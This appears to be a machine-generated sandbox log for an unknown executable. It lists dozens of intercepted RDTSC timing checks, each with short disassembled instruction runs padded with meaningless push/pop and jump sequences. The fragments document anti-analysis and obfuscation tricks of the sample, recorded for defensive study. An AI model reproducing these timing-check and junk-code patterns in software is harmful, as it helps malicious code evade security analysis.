Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A26A4 second address: 5A26D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jnc 00007FC2192E8586h 0x0000000f jmp 00007FC2192E858Ah 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC2192E8598h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A26D8 second address: 5A26DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D7D8B second address: 5D7D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D7EF0 second address: 5D7F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC218F099B6h 0x0000000a jl 00007FC218F099B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D7F05 second address: 5D7F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D7F09 second address: 5D7F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D7F0F second address: 5D7F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC2192E858Ah 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jnc 00007FC2192E858Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D7F2E second address: 5D7F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D7F34 second address: 5D7F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC2192E8586h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D81BB second address: 5D81C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D85DD second address: 5D85E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D8768 second address: 5D876E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D876E second address: 5D8772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D890C second address: 5D8912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D8A5E second address: 5D8A69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC2192E8586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D8A69 second address: 5D8A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC218F099D0h 0x0000000f jns 00007FC218F099BEh 0x00000015 jnl 00007FC218F099B6h 0x0000001b push edx 0x0000001c pop edx 0x0000001d jc 00007FC218F099BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D8CF7 second address: 5D8D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E858Ch 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FC2192E8586h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D8D12 second address: 5D8D51 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC218F099B6h 0x00000008 ja 00007FC218F099B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jl 00007FC218F099B6h 0x00000017 jmp 00007FC218F099C4h 0x0000001c jmp 00007FC218F099C2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D8D51 second address: 5D8D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5CE04E second address: 5CE05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC218F099BAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A5E4D second address: 5A5E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A5E53 second address: 5A5E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A5E57 second address: 5A5E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D9742 second address: 5D9748 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D9D1C second address: 5D9D30 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FC2192E858Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D9D30 second address: 5D9D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D9D37 second address: 5D9D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D9D3F second address: 5D9D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D9D4A second address: 5D9D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5D9D4F second address: 5D9D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A783F second address: 5A787E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 jo 00007FC2192E8586h 0x0000000c jmp 00007FC2192E858Dh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC2192E8597h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d jo 00007FC2192E8588h 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5DD752 second address: 5DD76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5DD76C second address: 5DD788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Ah 0x00000007 jne 00007FC2192E8588h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5DD788 second address: 5DD798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC218F099BAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A9303 second address: 5A9307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A9307 second address: 5A9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A9314 second address: 5A9331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8598h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A9331 second address: 5A9339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A9339 second address: 5A9354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jc 00007FC2192E8596h 0x0000000f jmp 00007FC2192E858Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5DF52F second address: 5DF535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5DF535 second address: 5DF539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5DF539 second address: 5DF53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E0554 second address: 5E055B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E06B9 second address: 5E06BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E6433 second address: 5E6438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5AAD7D second address: 5AAD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FC218F099B6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E5868 second address: 5E58A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8593h 0x00000009 jmp 00007FC2192E8592h 0x0000000e popad 0x0000000f jmp 00007FC2192E858Dh 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E58A5 second address: 5E58A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E5BC6 second address: 5E5BD6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2192E858Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E5BD6 second address: 5E5BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E5BDA second address: 5E5BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E5BDE second address: 5E5BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E5D4B second address: 5E5D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E5FFF second address: 5E6009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC218F099B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E6009 second address: 5E600D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E614B second address: 5E6150 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E9E3A second address: 5E9E55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E9E55 second address: 5E9E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5E9F6D second address: 5E9F7C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EA09E second address: 5EA0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EA530 second address: 5EA534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EA62F second address: 5EA633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EA633 second address: 5EA63D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2192E858Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EABCD second address: 5EABD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EABD1 second address: 5EAC11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC2192E8593h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e mov esi, dword ptr [ebp+13632EF9h] 0x00000014 nop 0x00000015 push eax 0x00000016 jp 00007FC2192E8590h 0x0000001c jmp 00007FC2192E858Ah 0x00000021 pop eax 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jc 00007FC2192E858Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EAC11 second address: 5EAC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EAF53 second address: 5EAF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EAF58 second address: 5EAF82 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC218F099B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FC218F099C7h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EB0B4 second address: 5EB0BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC2192E8586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EC825 second address: 5EC829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EC829 second address: 5EC82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5AFE5C second address: 5AFE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5AFE63 second address: 5AFE77 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2192E858Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5AFE77 second address: 5AFE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EE7B3 second address: 5EE7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EF11B second address: 5EF11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EF11F second address: 5EF12C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EF12C second address: 5EF13A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FC218F099B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F126D second address: 5F12EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007FC2192E8588h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 adc esi, 19F91DACh 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FC2192E8588h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+13632F7Dh] 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007FC2192E8588h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 mov dword ptr [ebp+13632353h], ecx 0x0000006a mov esi, 616EA334h 0x0000006f push eax 0x00000070 push ecx 0x00000071 push edi 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5EFA0E second address: 5EFA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F1B02 second address: 5F1B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F1B06 second address: 5F1B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC218F099B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F3286 second address: 5F32A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC2192E8586h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F1B10 second address: 5F1B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F32A7 second address: 5F32AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F32AB second address: 5F32B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F564F second address: 5F5653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F32B1 second address: 5F32B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F5653 second address: 5F5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F5660 second address: 5F5664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F6AA8 second address: 5F6AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F79C6 second address: 5F7A19 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FC218F099B6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f jmp 00007FC218F099C8h 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 nop 0x00000017 and ebx, dword ptr [ebp+136324B9h] 0x0000001d push 00000000h 0x0000001f jmp 00007FC218F099C3h 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+13632363h] 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5F7A19 second address: 5F7A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
